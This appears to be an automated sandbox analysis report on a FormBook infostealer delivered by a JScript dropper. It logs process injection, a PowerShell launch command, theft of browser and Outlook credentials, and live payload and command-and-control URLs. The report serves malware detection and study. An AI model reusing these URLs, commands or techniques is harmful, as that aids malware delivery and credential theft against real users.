                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeNtTerminateThread: Direct from: 0x77377B2EJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeSection loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\runonce.exeThread register set: target process: 4620Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\runonce.exeThread APC queued: target process: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B23008Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: tgV1MsdzZ4.exe, 00000009.00000000.2690813963.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 00000009.00000002.3425596619.0000000000F01000.00000002.00000001.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3425597266.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: tgV1MsdzZ4.exe, 00000009.00000000.2690813963.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 00000009.00000002.3425596619.0000000000F01000.00000002.00000001.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3425597266.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: tgV1MsdzZ4.exe, 00000009.00000000.2690813963.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 00000009.00000002.3425596619.0000000000F01000.00000002.00000001.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3425597266.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: tgV1MsdzZ4.exe, 00000009.00000000.2690813963.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 00000009.00000002.3425596619.0000000000F01000.00000002.00000001.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3425597266.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3423391595.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3424044771.0000000000DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3424239645.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2774125614.0000000005670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3426268261.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2768044762.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2770300922.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3423391595.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3424044771.0000000000DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3424239645.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2774125614.0000000005670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3426268261.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2768044762.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2770300922.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information52
                Scripting                		Valid Accounts1
                Exploitation for Client Execution                		52
                Scripting                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                PowerShell                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory113
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)712
                Process Injection                		1
                Abuse Elevation Control Mechanism                		Security Account Manager221
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook5
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets41
                Virtualization/Sandbox Evasion                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                Virtualization/Sandbox Evasion                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt712
                Process Injection                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617723 Sample: PO from tpc Type 34.1 34,2 ... Startdate: 18/02/2025 Architecture: WINDOWS Score: 100 45 www.seasay.xyz 2->45 47 www.l63339.xyz 2->47 49 2 other IPs or domains 2->49 73 Suricata IDS alerts for network traffic 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Antivirus detection for URL or domain 2->77 81 7 other signatures 2->81 12 wscript.exe 1 16 2->12         started        signatures3 79 Performs DNS queries to domains with low reputation 47->79 process4 dnsIp5 57 196.251.92.64, 49741, 80 Web4AfricaZA Seychelles 12->57 43 C:\Temp\dddddd.ps1, ASCII 12->43 dropped 99 System process connects to network (likely due to code injection or exploit) 12->99 101 JScript performs obfuscated calls to suspicious functions 12->101 103 Wscript starts Powershell (via cmd or directly) 12->103 105 2 other signatures 12->105 17 powershell.exe 13 12->17         started        file6 signatures7 process8 file9 41 C:\Users\user\AppData\Local\Temp\x.exe, PE32 17->41 dropped 67 Suspicious execution chain found 17->67 69 Found suspicious powershell code related to unpacking or dynamic code loading 17->69 71 Powershell drops PE file 17->71 21 x.exe 3 17->21         started        24 conhost.exe 17->24         started        signatures10 process11 signatures12 85 Antivirus detection for dropped file 21->85 87 Multi AV Scanner detection for dropped file 21->87 89 Writes to foreign memory regions 21->89 91 2 other signatures 21->91 26 RegAsm.exe 21->26         started        process13 signatures14 93 Maps a DLL or memory area into another process 26->93 29 tgV1MsdzZ4.exe 26->29 injected process15 signatures16 95 Maps a DLL or memory area into another process 29->95 97 Found direct / indirect Syscall (likely to bypass EDR) 29->97 32 runonce.exe 13 29->32         started        process17 signatures18 59 Tries to steal Mail credentials (via file / registry access) 32->59 61 Tries to harvest and steal browser information (history, passwords, etc) 32->61 63 Modifies the context of a thread in another process (thread injection) 32->63 65 3 other signatures 32->65 35 tgV1MsdzZ4.exe 32->35 injected 39 firefox.exe 32->39         started        process19 dnsIp20 51 www.seasay.xyz 103.106.67.112, 49985, 49986, 49987 VOYAGERNET-AS-APVoyagerInternetLtdNZ New Zealand 35->51 53 www.lucynoel6465.shop 104.21.112.1, 49994, 49995, 49996 CLOUDFLARENETUS United States 35->53 55 2 other IPs or domains 35->55 83 Found direct / indirect Syscall (likely to bypass EDR) 35->83 signatures21

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PO from tpc Type 34.1 34,2 35 Spec 1.js16%VirustotalBrowse
                PO from tpc Type 34.1 34,2 35 Spec 1.js11%ReversingLabsScript-JS.Dropper.Heuristic

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/Dropper.Gen
                C:\Users\user\AppData\Local\Temp\x.exe62%ReversingLabsWin32.Backdoor.FormBook

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://196.251.92.64/crypt/laser.ps1100%Avira URL Cloudmalware
                http://www.lucynoel6465.shop/jgkl/?cf2hYv=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+lylzXZBDngtVYDkWplwhs1JNVM9/WuG0QosQeZid/o9jeqLeg=&WHYh=mJr4VrfpGDBp100%Avira URL Cloudmalware
                http://196.251.92.6p0%Avira URL Cloudsafe
                http://www.l63339.xyz/vhr7/?cf2hYv=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0uX0JFKsYq7jFvEkjnfDBmxL2FKNTn2vhsZCjIw0EPfzx7R5kM=&WHYh=mJr4VrfpGDBp100%Avira URL Cloudmalware
                http://crl.microsoft00%Avira URL Cloudsafe
                http://196.251.92.64/crypt/laser.ps1A0%Avira URL Cloudsafe
                http://www.seasay.xyz/c9ts/?cf2hYv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7QzE7wP7HHXABn4vnPr4KbIzP7onr4No6wwmVIVHMDZ1g/WEU5TU=&WHYh=mJr4VrfpGDBp100%Avira URL Cloudmalware
                https://go.mi0%Avira URL Cloudsafe
                https://go.microsof0%Avira URL Cloudsafe
                http://www.lucynoel6465.shop0%Avira URL Cloudsafe
                http://www.tumbetgirislinki.fit/k566/?WHYh=mJr4VrfpGDBp&cf2hYv=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MwTnQBeuAzsSoj839zvz1sEY8eOyaRRELHSv6n+5nuEPWCNCpw=100%Avira URL Cloudmalware
                https://www.seasay.xyz/c9ts/?cf2hYv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAy100%Avira URL Cloudmalware
                https://go.m0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.l63339.xyz
                		162.218.30.235
                		truefalse
                  		high
                  www.seasay.xyz
                  		103.106.67.112
                  		truefalse
                    		high
                    www.tumbetgirislinki.fit
                    		104.21.16.1
                    		truefalse
                      		high
                      www.lucynoel6465.shop
                      		104.21.112.1
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://196.251.92.64/crypt/laser.ps1true
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.seasay.xyz/c9ts/false
                          		high
                          http://www.lucynoel6465.shop/jgkl/?cf2hYv=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+lylzXZBDngtVYDkWplwhs1JNVM9/WuG0QosQeZid/o9jeqLeg=&WHYh=mJr4VrfpGDBptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.l63339.xyz/vhr7/?cf2hYv=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0uX0JFKsYq7jFvEkjnfDBmxL2FKNTn2vhsZCjIw0EPfzx7R5kM=&WHYh=mJr4VrfpGDBptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.seasay.xyz/c9ts/?cf2hYv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7QzE7wP7HHXABn4vnPr4KbIzP7onr4No6wwmVIVHMDZ1g/WEU5TU=&WHYh=mJr4VrfpGDBptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.tumbetgirislinki.fit/k566/false
                            		high
                            http://www.tumbetgirislinki.fit/k566/?WHYh=mJr4VrfpGDBp&cf2hYv=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MwTnQBeuAzsSoj839zvz1sEY8eOyaRRELHSv6n+5nuEPWCNCpw=true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.lucynoel6465.shop/jgkl/false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabrunonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2302186412.0000026F8176C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000003.00000002.2302186412.0000026F81205000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icorunonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2302186412.0000026F815F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2302186412.0000026F815F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.ecosia.org/newtab/runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://196.251.92.6pwscript.exe, 00000000.00000003.2269852187.0000026AAEBE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2359834204.0000026AAEBE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2302186412.0000026F815F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/runonce.exe, 0000000A.00000002.3428238194.00000000055B4000.00000004.10000000.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3426565846.0000000002A64000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3074572069.000000000CAF4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://crl.microsoft0powershell.exe, 00000003.00000002.2349303803.0000026FEB795000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://196.251.92.64/crypt/laser.ps1Awscript.exe, 00000000.00000002.2365846996.0000026AAF38E000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ac.ecosia.org/autocomplete?q=runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://go.microsofpowershell.exe, 00000003.00000002.2350865881.0000026FED4DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://go.mipowershell.exe, 00000003.00000002.2350865881.0000026FED4DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referrunonce.exe, 0000000A.00000002.3428238194.00000000058D8000.00000004.10000000.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3426565846.0000000002D88000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://www.lucynoel6465.shoptgV1MsdzZ4.exe, 0000000B.00000002.3428450739.0000000004B22000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrunonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/powershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2302186412.0000026F8176C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://oneget.orgXpowershell.exe, 00000003.00000002.2302186412.0000026F81205000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://aka.ms/pscore68powershell.exe, 00000003.00000002.2302186412.0000026F80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.seasay.xyz/c9ts/?cf2hYv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAytgV1MsdzZ4.exe, 0000000B.00000002.3426565846.0000000002BF6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2302186412.0000026F80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://go.mpowershell.exe, 00000003.00000002.2350865881.0000026FED4DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://oneget.orgpowershell.exe, 00000003.00000002.2302186412.0000026F81205000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
